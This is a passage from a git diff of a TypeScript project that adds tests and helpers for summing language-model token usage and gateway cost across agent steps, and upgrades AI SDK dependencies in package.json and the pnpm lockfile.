); + expect(result.inputTokens).toBe(300); + expect(result.outputTokens).toBe(125); + expect(result.totalTokens).toBe(425); + }); + + it("sums nested cache token details", () => { + const result = addLanguageModelUsage( + { + inputTokens: 100, + outputTokens: 50, + inputTokenDetails: { cacheReadTokens: 10, cacheWriteTokens: 5, noCacheTokens: 85 }, + } as never, + { + inputTokens: 200, + outputTokens: 75, + inputTokenDetails: { cacheReadTokens: 20, cacheWriteTokens: 15, noCacheTokens: 165 }, + } as never, + ); + expect(result.inputTokenDetails?.cacheReadTokens).toBe(30); + expect(result.inputTokenDetails?.cacheWriteTokens).toBe(20); + expect(result.inputTokenDetails?.noCacheTokens).toBe(250); + }); + + it("returns undefined for fields missing on both inputs", () => { + const result = addLanguageModelUsage( + { inputTokens: 100 } as never, + { inputTokens: 200 } as never, + ); + expect(result.outputTokens).toBeUndefined(); + expect(result.totalTokens).toBeUndefined(); + }); + + it("treats missing field on one side as 0", () => { + const result = addLanguageModelUsage( + { inputTokens: 100, outputTokens: 50 } as never, + { inputTokens: 200 } as never, + ); + expect(result.outputTokens).toBe(50); + }); +}); diff --git a/lib/agent/messageMetadata/__tests__/addTokenCounts.test.ts b/lib/agent/messageMetadata/__tests__/addTokenCounts.test.ts new file mode 100644 index 000000000..b0c449c0c --- /dev/null +++ b/lib/agent/messageMetadata/__tests__/addTokenCounts.test.ts @@ -0,0 +1,27 @@ +import { describe, it, expect } from "vitest"; +import { addTokenCounts } from "@/lib/agent/messageMetadata/addTokenCounts"; + +describe("addTokenCounts", () => { + it("returns undefined when both inputs are undefined", () => { + expect(addTokenCounts(undefined, undefined)).toBeUndefined(); + }); + + it("returns undefined when both inputs are null", () => { + expect(addTokenCounts(null as never, null as never)).toBeUndefined(); + }); + + it("sums two numbers", () => { + expect(addTokenCounts(100, 50)).toBe(150); + }); + + it("treats undefined on one side as 0", () => { + expect(addTokenCounts(100, undefined)).toBe(100); + expect(addTokenCounts(undefined, 50)).toBe(50); + }); + + it("handles zero correctly (not confused with undefined)", () => { + expect(addTokenCounts(0, 50)).toBe(50); + expect(addTokenCounts(0, 0)).toBe(0); + expect(addTokenCounts(0, undefined)).toBe(0); + }); +}); diff --git a/lib/agent/messageMetadata/__tests__/buildMessageMetadataCallback.test.ts b/lib/agent/messageMetadata/__tests__/buildMessageMetadataCallback.test.ts new file mode 100644 index 000000000..7afd14e00 --- /dev/null +++ b/lib/agent/messageMetadata/__tests__/buildMessageMetadataCallback.test.ts @@ -0,0 +1,93 @@ +import { describe, it, expect } from "vitest"; +import { buildMessageMetadataCallback } from "@/lib/agent/messageMetadata/buildMessageMetadataCallback"; + +const MODEL_ID = "anthropic/claude-haiku-4.5"; + +// `ai@^6.0.190` uses the flat LanguageModelUsage shape — same as the +// open-agents UI consumes — so the callback passes usage through +// without any shape conversion. +function finishStepPart(opts: { + inputTokens?: number; + outputTokens?: number; + cost?: string; + finishReason?: string; +}) { + const inputTokens = opts.inputTokens ?? 100; + const outputTokens = opts.outputTokens ?? 50; + return { + type: "finish-step", + usage: { + inputTokens, + outputTokens, + totalTokens: inputTokens + outputTokens, + inputTokenDetails: { + noCacheTokens: inputTokens, + cacheReadTokens: undefined, + cacheWriteTokens: undefined, + }, + outputTokenDetails: { + textTokens: outputTokens, + reasoningTokens: undefined, + }, + }, + providerMetadata: opts.cost ? { gateway: { cost: opts.cost } } : undefined, + finishReason: opts.finishReason ?? "tool-calls", + } as never; +} + +describe("buildMessageMetadataCallback", () => { + it("returns undefined for non-finish-step parts (start, text-delta, tool-call, etc.)", () => { + const cb = buildMessageMetadataCallback({ modelId: MODEL_ID }); + expect(cb({ part: { type: "text-delta", delta: "hi" } as never })).toBeUndefined(); + expect(cb({ part: { type: "start" } as never })).toBeUndefined(); + expect(cb({ part: { type: "tool-call", toolName: "bash" } as never })).toBeUndefined(); + }); + + it("emits modelId + selectedModelId + usage on the first finish-step", () => { + const cb = buildMessageMetadataCallback({ modelId: MODEL_ID }); + const meta = cb({ part: finishStepPart({ inputTokens: 100, outputTokens: 50 }) }); + expect(meta).toMatchObject({ + modelId: MODEL_ID, + selectedModelId: MODEL_ID, + lastStepUsage: { inputTokens: 100, outputTokens: 50 }, + totalMessageUsage: { inputTokens: 100, outputTokens: 50 }, + }); + }); + + it("emits cost when the gateway provider metadata includes it", () => { + const cb = buildMessageMetadataCallback({ modelId: MODEL_ID }); + const meta = cb({ part: finishStepPart({ cost: "0.025" }) }); + expect(meta).toMatchObject({ lastStepCost: 0.025, totalMessageCost: 0.025 }); + }); + + it("omits cost fields when the gateway did not report one", () => { + const cb = buildMessageMetadataCallback({ modelId: MODEL_ID }); + const meta = cb({ part: finishStepPart({}) }) as Record; + expect(meta.lastStepCost).toBeUndefined(); + expect(meta.totalMessageCost).toBeUndefined(); + }); + + it("accumulates usage AND cost across multiple finish-step calls", () => { + const cb = buildMessageMetadataCallback({ modelId: MODEL_ID }); + cb({ part: finishStepPart({ inputTokens: 100, outputTokens: 50, cost: "0.01" }) }); + const meta = cb({ + part: finishStepPart({ inputTokens: 200, outputTokens: 75, cost: "0.03" }), + }); + expect(meta).toMatchObject({ + lastStepUsage: { inputTokens: 200, outputTokens: 75 }, + totalMessageUsage: { inputTokens: 300, outputTokens: 125 }, + lastStepCost: 0.03, + totalMessageCost: 0.04, + }); + }); + + it("records lastStepFinishReason and stepFinishReasons history", () => { + const cb = buildMessageMetadataCallback({ modelId: MODEL_ID }); + cb({ part: finishStepPart({ finishReason: "tool-calls" }) }); + const meta = cb({ part: finishStepPart({ finishReason: "stop" }) }); + expect(meta).toMatchObject({ + lastStepFinishReason: "stop", + stepFinishReasons: [{ finishReason: "tool-calls" }, { finishReason: "stop" }], + }); + }); +}); diff --git a/lib/agent/messageMetadata/__tests__/extractGatewayCost.test.ts b/lib/agent/messageMetadata/__tests__/extractGatewayCost.test.ts new file mode 100644 index 000000000..d1c678914 --- /dev/null +++ b/lib/agent/messageMetadata/__tests__/extractGatewayCost.test.ts @@ -0,0 +1,28 @@ +import { describe, it, expect } from "vitest"; +import { extractGatewayCost } from "@/lib/agent/messageMetadata/extractGatewayCost"; + +describe("extractGatewayCost", () => { + it("returns undefined when providerMetadata is missing", () => { + expect(extractGatewayCost(undefined)).toBeUndefined(); + }); + + it("returns undefined when there is no `gateway` namespace", () => { + expect(extractGatewayCost({ openai: { foo: "bar" } } as never)).toBeUndefined(); + }); + + it("returns undefined when `gateway.cost` is missing", () => { + expect(extractGatewayCost({ gateway: {} } as never)).toBeUndefined(); + }); + + it("parses a numeric string cost", () => { + expect(extractGatewayCost({ gateway: { cost: "0.0420" } } as never)).toBe(0.042); + }); + + it("returns undefined when cost is non-numeric", () => { + expect(extractGatewayCost({ gateway: { cost: "not-a-number" } } as never)).toBeUndefined(); + }); + + it("returns undefined when cost is a number (gateway should send strings)", () => { + expect(extractGatewayCost({ gateway: { cost: 0.05 } } as never)).toBeUndefined(); + }); +}); diff --git a/lib/agent/messageMetadata/__tests__/hasGatewayShape.test.ts b/lib/agent/messageMetadata/__tests__/hasGatewayShape.test.ts new file mode 100644 index 000000000..c2c24f64f --- /dev/null +++ b/lib/agent/messageMetadata/__tests__/hasGatewayShape.test.ts @@ -0,0 +1,25 @@ +import { describe, it, expect } from "vitest"; +import { hasGatewayShape } from "@/lib/agent/messageMetadata/hasGatewayShape"; + +describe("hasGatewayShape", () => { + it("returns false for undefined metadata", () => { + expect(hasGatewayShape(undefined)).toBe(false); + }); + + it("returns false when there is no `gateway` namespace", () => { + expect(hasGatewayShape({ openai: { foo: "bar" } } as never)).toBe(false); + }); + + it("returns false when `gateway` is null", () => { + expect(hasGatewayShape({ gateway: null } as never)).toBe(false); + }); + + it("returns false when `gateway` is a string (not an object)", () => { + expect(hasGatewayShape({ gateway: "oops" } as never)).toBe(false); + }); + + it("returns true when `gateway` is an object (even empty)", () => { + expect(hasGatewayShape({ gateway: {} } as never)).toBe(true); + expect(hasGatewayShape({ gateway: { cost: "0.05" } } as never)).toBe(true); + }); +}); diff --git a/lib/agent/messageMetadata/addLanguageModelUsage.ts b/lib/agent/messageMetadata/addLanguageModelUsage.ts new file mode 100644 index 000000000..4a676364f --- /dev/null +++ b/lib/agent/messageMetadata/addLanguageModelUsage.ts @@ -0,0 +1,49 @@ +import type { LanguageModelUsage } from "ai"; +import { addTokenCounts } from "@/lib/agent/messageMetadata/addTokenCounts"; + +/** + * Pointwise-sum two `LanguageModelUsage` records (the flat shape used by + * `ai@^6.0.190`). Mirrors `packages/agent/usage.ts:addLanguageModelUsage` + * in the open-agents source. Used to accumulate per-step usage into a + * per-message total inside the `messageMetadata` callback. + * + * Returns `undefined` for fields that are missing on BOTH inputs, so + * the resulting usage object stays sparse rather than introducing + * spurious zeros. + */ +export function addLanguageModelUsage( + a: LanguageModelUsage, + b: LanguageModelUsage, +): LanguageModelUsage { + return { + inputTokens: addTokenCounts(a.inputTokens, b.inputTokens), + inputTokenDetails: { + noCacheTokens: addTokenCounts( + a.inputTokenDetails?.noCacheTokens, + b.inputTokenDetails?.noCacheTokens, + ), + cacheReadTokens: addTokenCounts( + a.inputTokenDetails?.cacheReadTokens, + b.inputTokenDetails?.cacheReadTokens, + ), + cacheWriteTokens: addTokenCounts( + a.inputTokenDetails?.cacheWriteTokens, + b.inputTokenDetails?.cacheWriteTokens, + ), + }, + outputTokens: addTokenCounts(a.outputTokens, b.outputTokens), + outputTokenDetails: { + textTokens: addTokenCounts( + a.outputTokenDetails?.textTokens, + b.outputTokenDetails?.textTokens, + ), + reasoningTokens: addTokenCounts( + a.outputTokenDetails?.reasoningTokens, + b.outputTokenDetails?.reasoningTokens, + ), + }, + totalTokens: addTokenCounts(a.totalTokens, b.totalTokens), + reasoningTokens: addTokenCounts(a.reasoningTokens, b.reasoningTokens), + cachedInputTokens: addTokenCounts(a.cachedInputTokens, b.cachedInputTokens), + }; +} diff --git a/lib/agent/messageMetadata/addTokenCounts.ts b/lib/agent/messageMetadata/addTokenCounts.ts new file mode 100644 index 000000000..354a79f32 --- /dev/null +++ b/lib/agent/messageMetadata/addTokenCounts.ts @@ -0,0 +1,13 @@ +/** + * Pointwise-sum two `number | undefined` token counts. Returns + * `undefined` only when BOTH inputs are missing — so sparse usage + * records (where the provider only reported some fields) stay sparse + * after summation instead of introducing spurious zeros. + * + * Mirrors open-agents' internal `addTokenCounts` helper inside + * `packages/agent/usage.ts`. + */ +export function addTokenCounts(a: number | undefined, b: number | undefined): number | undefined { + if (a == null && b == null) return undefined; + return (a ?? 0) + (b ?? 0); +} diff --git a/lib/agent/messageMetadata/buildMessageMetadataCallback.ts b/lib/agent/messageMetadata/buildMessageMetadataCallback.ts new file mode 100644 index 000000000..07225fd6a --- /dev/null +++ b/lib/agent/messageMetadata/buildMessageMetadataCallback.ts @@ -0,0 +1,81 @@ +import type { LanguageModelUsage, TextStreamPart, ToolSet } from "ai"; +import { addLanguageModelUsage } from "@/lib/agent/messageMetadata/addLanguageModelUsage"; +import { extractGatewayCost } from "@/lib/agent/messageMetadata/extractGatewayCost"; +import type { AgentMessageMetadata } from "@/lib/agent/messageMetadata/AgentMessageMetadata"; +import type { AgentStepFinishMetadata } from "@/lib/agent/messageMetadata/AgentStepFinishMetadata"; + +/** + * Build a stateful `messageMetadata` callback for `toUIMessageStream`. + * Accumulates per-step usage + cost across an assistant turn and emits + * the running totals on every `finish-step` part. Non-finish parts + * return `undefined` (AI SDK skips emission). + * + * Mirrors open-agents' `apps/web/app/workflows/chat.ts` callback shape + * so sandbox.recoupable.com's UI can render model/cost/usage badges + * when cut over to api's `/api/chat/workflow`. api and open-agents now + * share the same `ai@^6.0.190` shape for `LanguageModelUsage`, so no + * shape conversion happens here. + * + * Each call to `buildMessageMetadataCallback` returns a FRESH closure — + * one per assistant turn — so totals reset between turns. + */ +export function buildMessageMetadataCallback(opts: { modelId: string }) { + let lastStepUsage: LanguageModelUsage | undefined; + let totalMessageUsage: LanguageModelUsage | undefined; + let lastStepCost: number | undefined; + let totalMessageCost: number | undefined; + let stepFinishReasons: AgentStepFinishMetadata[] = []; + + return function messageMetadata({ + part, + }: { + part: TextStreamPart; + }): AgentMessageMetadata | undefined { + if (part.type !== "finish-step") return undefined; + + const finishPart = part as TextStreamPart & { + usage?: LanguageModelUsage; + providerMetadata?: Parameters[0]; + finishReason?: AgentStepFinishMetadata["finishReason"]; + rawFinishReason?: string; + }; + + if (finishPart.usage) { + lastStepUsage = finishPart.usage; + totalMessageUsage = totalMessageUsage + ? addLanguageModelUsage(totalMessageUsage, finishPart.usage) + : finishPart.usage; + } + + const stepCost = extractGatewayCost(finishPart.providerMetadata); + if (stepCost !== undefined) { + lastStepCost = stepCost; + totalMessageCost = (totalMessageCost ?? 0) + stepCost; + } + + if (finishPart.finishReason) { + stepFinishReasons = [ + ...stepFinishReasons, + { + finishReason: finishPart.finishReason, + rawFinishReason: finishPart.rawFinishReason, + }, + ]; + } + + return { + // `selectedModelId` and `modelId` are equal in api today (no + // gateway fallback routing exposed) — emit both for shape + // parity with open-agents' WebAgentMessageMetadata. + selectedModelId: opts.modelId, + modelId: opts.modelId, + lastStepUsage, + totalMessageUsage, + lastStepCost, + totalMessageCost, + lastStepFinishReason: finishPart.finishReason, + lastStepRawFinishReason: finishPart.rawFinishReason, + stepFinishReasons, + }; + }; +} diff --git a/lib/agent/messageMetadata/extractGatewayCost.ts b/lib/agent/messageMetadata/extractGatewayCost.ts new file mode 100644 index 000000000..42ef13f63 --- /dev/null +++ b/lib/agent/messageMetadata/extractGatewayCost.ts @@ -0,0 +1,20 @@ +import type { ProviderMetadata } from "ai"; +import { hasGatewayShape } from "@/lib/agent/messageMetadata/hasGatewayShape"; + +/** + * Extract the gateway-reported cost for a single step. + * Returns `undefined` when the step did not go through the gateway, + * the gateway did not attach a cost (e.g. direct provider call), or + * the cost is malformed. + * + * Mirrors open-agents' `apps/web/app/workflows/gateway-metadata.ts`. + */ +export function extractGatewayCost( + providerMetadata: ProviderMetadata | undefined, +): number | undefined { + if (!hasGatewayShape(providerMetadata)) return undefined; + const rawCost = providerMetadata.gateway.cost; + if (typeof rawCost !== "string") return undefined; + const cost = Number.parseFloat(rawCost); + return Number.isFinite(cost) ? cost : undefined; +} diff --git a/lib/agent/messageMetadata/hasGatewayShape.ts b/lib/agent/messageMetadata/hasGatewayShape.ts new file mode 100644 index 000000000..db322c8e7 --- /dev/null +++ b/lib/agent/messageMetadata/hasGatewayShape.ts @@ -0,0 +1,18 @@ +import type { ProviderMetadata } from "ai"; +import type { GatewayProviderMetadata } from "@/lib/agent/messageMetadata/GatewayProviderMetadata"; + +/** + * Type guard for the Vercel AI Gateway entry inside a step's + * `providerMetadata`. Returns true when the metadata has a non-null + * `gateway` object (cost may still be absent). Splitting this out from + * `extractGatewayCost` keeps each file to a single responsibility and + * makes the guard reusable when other gateway fields (e.g. + * `inferenceCost`) get plumbed through later. + */ +export function hasGatewayShape( + metadata: ProviderMetadata | undefined, +): metadata is ProviderMetadata & GatewayProviderMetadata { + if (!metadata) return false; + const gateway = (metadata as Record).gateway; + return typeof gateway === "object" && gateway !== null; +} diff --git a/lib/chat/setupChatRequest.ts b/lib/chat/setupChatRequest.ts index f88654de3..949ca29cb 100644 --- a/lib/chat/setupChatRequest.ts +++ b/lib/chat/setupChatRequest.ts @@ -18,10 +18,12 @@ import getGeneralAgent from "@/lib/agents/generalAgent/getGeneralAgent"; export async function setupChatRequest(body: ChatRequestBody): Promise { const decision = await getGeneralAgent(body); - const convertedMessages = convertToModelMessages(body.messages, { - tools: decision.agent.tools, - ignoreIncompleteToolCalls: true, - }).slice(-MAX_MESSAGES); + const convertedMessages = ( + await convertToModelMessages(body.messages, { + tools: decision.agent.tools, + ignoreIncompleteToolCalls: true, + }) + ).slice(-MAX_MESSAGES); return { agent: decision.agent, diff --git a/package.json b/package.json index 4b5a23bc0..f2d1ba03a 100644 --- a/package.json +++ b/package.json @@ -17,11 +17,11 @@ "eval": "braintrust eval --external-packages playwright playwright-core chromium-bidi @browserbasehq/stagehand @composio/core @composio/vercel" }, "dependencies": { - "@ai-sdk/anthropic": "^3.0.13", - "@ai-sdk/gateway": "2.0.83", - "@ai-sdk/google": "^3.0.8", - "@ai-sdk/mcp": "^0.0.12", - "@ai-sdk/openai": "^3.0.10", + "@ai-sdk/anthropic": "^3.0.78", + "@ai-sdk/gateway": "3.0.119", + "@ai-sdk/google": "^3.0.79", + "@ai-sdk/mcp": "^1.0.43", + "@ai-sdk/openai": "^3.0.65", "@chat-adapter/github": "^4.15.0", "@chat-adapter/slack": "^4.15.0", "@chat-adapter/state-ioredis": "^4.15.0", @@ -37,7 +37,7 @@ "@trigger.dev/sdk": "^4.4.3", "@vercel/blob": "^2.3.1", "@vercel/sandbox": "2.0.0-beta.11", - "ai": "6.0.0-beta.122", + "ai": "6.0.190", "apify-client": "^2.20.0", "arweave": "^1.15.7", "autoevals": "^0.0.129", diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml index eee3c93c9..7b4a331ad 100644 --- a/pnpm-lock.yaml +++ b/pnpm-lock.yaml @@ -9,20 +9,20 @@ importers: .: dependencies: '@ai-sdk/anthropic': - specifier: ^3.0.13 - version: 3.0.13(zod@4.1.13) + specifier: ^3.0.78 + version: 3.0.78(zod@4.1.13) '@ai-sdk/gateway': - specifier: 2.0.83 - version: 2.0.83(zod@4.1.13) + specifier: 3.0.119 + version: 3.0.119(zod@4.1.13) '@ai-sdk/google': - specifier: ^3.0.8 - version: 3.0.8(zod@4.1.13) + specifier: ^3.0.79 + version: 3.0.79(zod@4.1.13) '@ai-sdk/mcp': - specifier: ^0.0.12 - version: 0.0.12(zod@4.1.13) + specifier: ^1.0.43 + version: 1.0.43(zod@4.1.13) '@ai-sdk/openai': - specifier: ^3.0.10 - version: 3.0.10(zod@4.1.13) + specifier: ^3.0.65 + version: 3.0.65(zod@4.1.13) '@chat-adapter/github': specifier: ^4.15.0 version: 4.15.0 @@ -46,7 +46,7 @@ importers: version: 0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13) '@composio/vercel': specifier: ^0.3.4 - version: 0.3.4(@composio/core@0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13))(ai@6.0.0-beta.122(zod@4.1.13)) + version: 0.3.4(@composio/core@0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13))(ai@6.0.190(zod@4.1.13)) '@fal-ai/client': specifier: ^1.9.5 version: 1.9.5 @@ -61,7 +61,7 @@ importers: version: 2.86.0(bufferutil@4.0.9)(utf-8-validate@5.0.10) '@trigger.dev/sdk': specifier: ^4.4.3 - version: 4.4.3(ai@6.0.0-beta.122(zod@4.1.13))(bufferutil@4.0.9)(utf-8-validate@5.0.10)(zod@4.1.13) + version: 4.4.3(ai@6.0.190(zod@4.1.13))(bufferutil@4.0.9)(utf-8-validate@5.0.10)(zod@4.1.13) '@vercel/blob': specifier: ^2.3.1 version: 2.3.1 @@ -69,8 +69,8 @@ importers: specifier: 2.0.0-beta.11 version: 2.0.0-beta.11 ai: - specifier: 6.0.0-beta.122 - version: 6.0.0-beta.122(zod@4.1.13) + specifier: 6.0.190 + version: 6.0.190(zod@4.1.13) apify-client: specifier: ^2.20.0 version: 2.20.0 @@ -204,72 +204,38 @@ packages: '@adraffy/ens-normalize@1.11.1': resolution: {integrity: sha512-nhCBV3quEgesuf7c7KYfperqSS14T8bYuvJ8PcLJp6znkZpFc0AuW4qBtr8eKVyPPe/8RSr7sglCWPU5eaxwKQ==} - '@ai-sdk/anthropic@3.0.13': - resolution: {integrity: sha512-62UqSpZWuR8pU2ZLc1IgPYiNdH01blAcaNEjrQtx4wCN7L2fUTXm/iG6Tq9qRCiRED+8eQ43olggbf0fbguqkA==} + '@ai-sdk/anthropic@3.0.78': + resolution: {integrity: sha512-0OY12G20cUt6iU6htpEA1491Oz++NVxZxlmWGX4B7rSbeZ5pnDmOu6YtW9BKzdZlNx5Gn23i6WMxyZFoMKNcgA==} engines: {node: '>=18'} peerDependencies: zod: ^3.25.76 || ^4.1.8 - '@ai-sdk/gateway@2.0.0-beta.66': - resolution: {integrity: sha512-9H4Y4pFcTlDqLOjhJNfHVJrmQiGGqzQLIDNKSGhab90KYgeZc7NouQF752jUIlEZCY1S4QynuUKISTUsKR6Qjg==} + '@ai-sdk/gateway@3.0.119': + resolution: {integrity: sha512-VAhfRWC+JexZakkVfmjaJKaTj00x7/UHdE8kMWL3NhuQAlf8oXtg9r4dfvFZrByXxchGRBvYE3biEUyibkg0xg==} engines: {node: '>=18'} peerDependencies: zod: ^3.25.76 || ^4.1.8 - '@ai-sdk/gateway@2.0.83': - resolution: {integrity: sha512-qgxu2++9tJTPZtC+VGczu21YNXTtzfrLQunqh7xcCaWSogAluchrGiKFS3IZkX7Se9dEt1yYZ6+d+cGo4cko6Q==} + '@ai-sdk/google@3.0.79': + resolution: {integrity: sha512-QWVAvYeA7JzEX2wkSyXOWv/I9PD9kvTzdykkSTLi+Eu8RyJ6gA0tdPIGa8esEtOcHE//G5vy6FTB70qQw8l/uw==} engines: {node: '>=18'} peerDependencies: zod: ^3.25.76 || ^4.1.8 - '@ai-sdk/google@3.0.8': - resolution: {integrity: sha512-HiDetkn01f8ibcu6atygkPXsy6YgNA2uNz2bwgn6xHQQB1FsCCjDo8ylPA2EvaUbNypmD7oPj0zObDgwfE25Ug==} + '@ai-sdk/mcp@1.0.43': + resolution: {integrity: sha512-HdDMeyCcfIn5tW/P1kJ+BmYP8vfY8vppRn7swbVNRcLeFz/cpwik+B+C49Up4u5scRAcATtRJywOa7/rA4BmIA==} engines: {node: '>=18'} peerDependencies: zod: ^3.25.76 || ^4.1.8 - '@ai-sdk/mcp@0.0.12': - resolution: {integrity: sha512-hyf31U2CmgGexqOLgLfno525pjbqidJLu9pU+XcEwW/PkMcfTFuRq1iD3wbqtAmURRW0qJITiKV+in1B4I23gA==} + '@ai-sdk/openai@3.0.65': + resolution: {integrity: sha512-ZlVoWH+zrdiYDiUt6n/xvfCsk33mzsB81TUQkBRVx79rxU1FKZqVH9J/QCtEpSLqx0cUzjvtIw9l9p7EbUv+dw==} engines: {node: '>=18'} peerDependencies: zod: ^3.25.76 || ^4.1.8 - '@ai-sdk/openai@3.0.10': - resolution: {integrity: sha512-G6HJORN0rKuCFrqIUiYchjl2b4UjzKvv3VcNuW7xwQIdI8EcdB9Pr8ZaR9nEImK9E639nM8gCfvFEUM1xwGaCA==} - engines: {node: '>=18'} - peerDependencies: - zod: ^3.25.76 || ^4.1.8 - - '@ai-sdk/provider-utils@3.0.19': - resolution: {integrity: sha512-W41Wc9/jbUVXVwCN/7bWa4IKe8MtxO3EyA0Hfhx6grnmiYlCvpI8neSYWFE0zScXJkgA/YK3BRybzgyiXuu6JA==} - engines: {node: '>=18'} - peerDependencies: - zod: ^3.25.76 || ^4.1.8 - - '@ai-sdk/provider-utils@3.0.24': - resolution: {integrity: sha512-Zq6olgYvpMgfstQNpDwgqDC2wBEE+OnMnMuq4JyIu+aWjL8JJl+6u1sbKJNPxASErWrRlmOPIkat2fHiN4puhA==} - engines: {node: '>=18'} - peerDependencies: - zod: ^3.25.76 || ^4.1.8 - - '@ai-sdk/provider-utils@4.0.0-beta.38': - resolution: {integrity: sha512-m1klVKT8KntgEIxHnSGEzdhdn48Uf/w6fe5rPWGnpTd+P532mADV7BC4txNYp40ziS5Z9VV1g1wn2xRScwEeRw==} - engines: {node: '>=18'} - peerDependencies: - '@valibot/to-json-schema': ^1.3.0 - arktype: ^2.1.22 - effect: ^3.18.4 - zod: ^3.25.76 || ^4.1.8 - peerDependenciesMeta: - '@valibot/to-json-schema': - optional: true - arktype: - optional: true - effect: - optional: true - - '@ai-sdk/provider-utils@4.0.6': - resolution: {integrity: sha512-o/SP1GQOrpXAzHjMosPHI0Pu+YkwxIMndSjSLrEXtcVixdrjqrGaA9I7xJcWf+XpRFJ9byPHrKYnprwS+36gMg==} + '@ai-sdk/provider-utils@4.0.27': + resolution: {integrity: sha512-ubkAJ+xODouwtmN1tYlvTPphH1hPOBfZaEQe8U7skGvFAnIRs9PPpsq57bC2+Ky/MB4yzhd6YOsxTAx9sGpazw==} engines: {node: '>=18'} peerDependencies: zod: ^3.25.76 || ^4.1.8 @@ -278,20 +244,8 @@ packages: resolution: {integrity: sha512-qZMxYJ0qqX/RfnuIaab+zp8UAeJn/ygXXAffR5I4N0n1IrvA6qBsjc8hXLmBiMV2zoXlifkacF7sEFnYnjBcqg==} engines: {node: '>=18'} - '@ai-sdk/provider@2.0.0': - resolution: {integrity: sha512-6o7Y2SeO9vFKB8lArHXehNuusnpddKPk7xqL7T2/b+OvXMRIXUO1rR4wcv1hAFUAT9avGZshty3Wlua/XA7TvA==} - engines: {node: '>=18'} - - '@ai-sdk/provider@2.0.2': - resolution: {integrity: sha512-Epf0oKdUxNRK97Qm4l/Sp05TnwzE8FsyRF5p6nncOp8zH0GTuwK2uZoyzE/3uVjRdZNLyQ6Jw/SBjlOScMQy1Q==} - engines: {node: '>=18'} - - '@ai-sdk/provider@3.0.0-beta.20': - resolution: {integrity: sha512-+JqXbqHHtucRsMFGidygRyftpjX1GD2r4cG3Sh2URZ6g8IaN8k4loXNh2gX92dd4YjlYYn3eTHp3R8dDJfX25Q==} - engines: {node: '>=18'} - - '@ai-sdk/provider@3.0.3': - resolution: {integrity: sha512-qGPYdoAuECaUXPrrz0BPX1SacZQuJ6zky0aakxpW89QW1hrY0eF4gcFm/3L9Pk8C5Fwe+RvBf2z7ZjDhaPjnlg==} + '@ai-sdk/provider@3.0.10': + resolution: {integrity: sha512-Q3BZ27qfpYqnCYGvE3vt+Qi6LGOF9R5Nmzn+9JoM1lCRsD9mYaIhfJLkSunN48nfGXJ6n+XNV0J/XVpqGQl7Dw==} engines: {node: '>=18'} '@alloc/quick-lru@5.2.0': @@ -3252,14 +3206,6 @@ packages: '@aws-sdk/credential-provider-web-identity': optional: true - '@vercel/oidc@3.0.5': - resolution: {integrity: sha512-fnYhv671l+eTTp48gB4zEsTW/YtRgRPnkI2nT7x6qw5rkI1Lq2hTmQIpHPgyThI0znLK+vX2n9XxKdXZ7BUbbw==} - engines: {node: '>= 20'} - - '@vercel/oidc@3.1.0': - resolution: {integrity: sha512-Fw28YZpRnA3cAHHDlkt7xQHiJ0fcL+NRcIqsocZQUSmbzeIKRpwttJjik5ZGanXP+vlA4SbTg+AbA3bP363l+w==} - engines: {node: '>= 20'} - '@vercel/oidc@3.2.0': resolution: {integrity: sha512-UycprH3T6n3jH0k44NHMa7pnFHGu/N05MjojYr+Mc6I7obkoLIJujSWwin1pCvdy/eOxrI/l3uDLQsmcrOb4ug==} engines: {node: '>= 20'} @@ -3647,8 +3593,8 @@ packages: resolution: {integrity: sha512-kja8j7PjmncONqaTsB8fQ+wE2mSU2DJ9D4XKoJ5PFWIdRMa6SLSN1ff4mOr4jCbfRSsxR4keIiySJU0N9T5hIQ==} engines: {node: '>= 8.0.0'} - ai@6.0.0-beta.122: - resolution: {integrity: sha512-Lk8hWSX22eyJBwZvIRY+Bgl8piVB9Jadqv+ine0B2lDJWPg3lsmQac3kSAzGhPBeNeaxm22sHCs9JhuJh3gW5Q==} + ai@6.0.190: + resolution: {integrity: sha512-T+ixHbWZ6jmHRREpVVJTkFyWJeCekCdzLPan7lp1F32jG5OUw4+odlVYjtMRXVzogU+pWzpMmXdRiHUmdL/q0w==} engines: {node: '>=18'} peerDependencies: zod: ^3.25.76 || ^4.1.8 @@ -4834,6 +4780,10 @@ packages: resolution: {integrity: sha512-Vo1ab+QXPzZ4tCa8SwIHJFaSzy4R6SHf7BY79rFBDf0idraZWAkYrDjDj8uWaSm3S2TK+hJ7/t1CEmZ7jXw+pg==} engines: {node: '>=18.0.0'} + eventsource-parser@3.0.8: + resolution: {integrity: sha512-70QWGkr4snxr0OXLRWsFLeRBIRPuQOvt4s8QYjmUlmlkyTZkRqS7EDVRZtzU3TiyDbXSzaOeF0XUKy8PchzukQ==} + engines: {node: '>=18.0.0'} + eventsource@3.0.7: resolution: {integrity: sha512-CRT1WTyuQoD771GW56XEZFQ/ZoSfWid1alKGDYMmkt2yl8UXrVR4pspqWNEcqKvVIzg6PAltWjxcSSPrboA4iA==} engines: {node: '>=18.0.0'} @@ -8173,94 +8123,50 @@ snapshots: '@adraffy/ens-normalize@1.11.1': {} - '@ai-sdk/anthropic@3.0.13(zod@4.1.13)': - dependencies: - '@ai-sdk/provider': 3.0.3 - '@ai-sdk/provider-utils': 4.0.6(zod@4.1.13) - zod: 4.1.13 - - '@ai-sdk/gateway@2.0.0-beta.66(zod@4.1.13)': + '@ai-sdk/anthropic@3.0.78(zod@4.1.13)': dependencies: - '@ai-sdk/provider': 3.0.0-beta.20 - '@ai-sdk/provider-utils': 4.0.0-beta.38(zod@4.1.13) - '@vercel/oidc': 3.0.5 + '@ai-sdk/provider': 3.0.10 + '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13) zod: 4.1.13 - transitivePeerDependencies: - - '@valibot/to-json-schema' - - arktype - - effect - '@ai-sdk/gateway@2.0.83(zod@4.1.13)': + '@ai-sdk/gateway@3.0.119(zod@4.1.13)': dependencies: - '@ai-sdk/provider': 2.0.2 - '@ai-sdk/provider-utils': 3.0.24(zod@4.1.13) - '@vercel/oidc': 3.1.0 + '@ai-sdk/provider': 3.0.10 + '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13) + '@vercel/oidc': 3.2.0 zod: 4.1.13 - '@ai-sdk/google@3.0.8(zod@4.1.13)': + '@ai-sdk/google@3.0.79(zod@4.1.13)': dependencies: - '@ai-sdk/provider': 